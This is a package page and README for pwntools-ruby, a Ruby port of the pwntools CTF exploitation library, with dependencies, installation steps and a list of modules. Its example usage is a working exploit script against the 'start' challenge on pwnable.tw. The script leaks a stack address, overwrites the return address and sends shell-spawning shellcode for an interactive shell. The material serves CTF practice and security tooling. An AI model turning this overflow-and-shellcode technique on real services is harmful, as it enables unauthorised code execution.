Project

pwntools

0.06
No release in over a year
Rewrite https://github.com/Gallopsled/pwntools in ruby. Implement useful/easy functions first, try to be of ruby style and don't follow original pwntools everywhere. Would still try to have similar name whenever possible.
2005
2006
2007
2008
2009
2010
2011
2012
2013
2014
2015
2016
2017
2018
2019
2020
2021
2022
 Dependencies

Development

= 5.10.1
~> 0.10
~> 13.0
~> 0.15, < 0.18
~> 0.9

Runtime

>= 2.0.11, < 3.5.0
>= 1.0.1, < 1.2.0
>= 1.6.2, < 1.8.0
>= 2.2, < 4.0
~> 2.4
 Project Readme

GitHub stars GitHub issues Build Status Test Coverage Code Climate Inline docs MIT License Dependabot Status Rawsec's CyberSecurity Inventory

pwntools-ruby

Always sad when playing CTF that there's nothing equivalent to pwntools in Python. While pwntools is awesome, I always love Ruby far more than Python... So this is an attempt to create such library.

Would try to have consistent naming with original pwntools, and do things in Ruby style.

Example Usage

Here's an exploitation for start which is a challenge on pwnable.tw.

# encoding: ASCII-8BIT
# The encoding line is important most time, or you'll get "\u0000" when using "\x00" in code,
# which is NOT what we want when doing pwn...

require 'pwn'

context.arch = 'i386'
context.log_level = :debug
z = Sock.new 'chall.pwnable.tw', 10000

z.recvuntil "Let's start the CTF:"
z.send p32(0x8048087).rjust(0x18, 'A')
stk = u32(z.recvuntil "\xff")
log.info "stack address: #{stk.hex}" # Log stack address

# Return to shellcode
addr = stk + 0x14
payload = addr.p32.rjust(0x18, 'A') + asm(shellcraft.sh)
z.write payload

# Switch to interactive mode
z.interact

More features and details can be found in the documentation.

Installation

Install the latest release:

gem install pwntools

Install from master branch:

git clone https://github.com/peter50216/pwntools-ruby
cd pwntools-ruby
bundle install && bundle exec rake install

optional

Some of the features (assembling/disassembling) require non-Ruby dependencies. Checkout the installation guide for keystone-engine and capstone-engine.

Or you are able to get running quickly with

# Install Capstone
sudo apt-get install libcapstone3

# Compile and install Keystone from source
sudo apt-get install cmake
git clone https://github.com/keystone-engine/keystone.git /tmp/keystone
cd /tmp/keystone
mkdir build
cd build
../make-share.sh
sudo make install

Supported Features

Architectures

  • i386
  • amd64
  • arm
  • thumb

Modules

  • context
  • asm
  • disasm
  • shellcraft
  • elf
  • dynelf
  • logger
  • tube
    • sock
    • process
    • serialtube
  • fmtstr
  • util
    • pack
    • cyclic
    • fiddling

Development

git clone https://github.com/peter50216/pwntools-ruby
cd pwntools-ruby
bundle
bundle exec rake

Note to irb users

irb defines main.context.

For the ease of exploit development in irb, that method would be removed if you use require 'pwn'.

You can still get the IRB::Context by irb_context.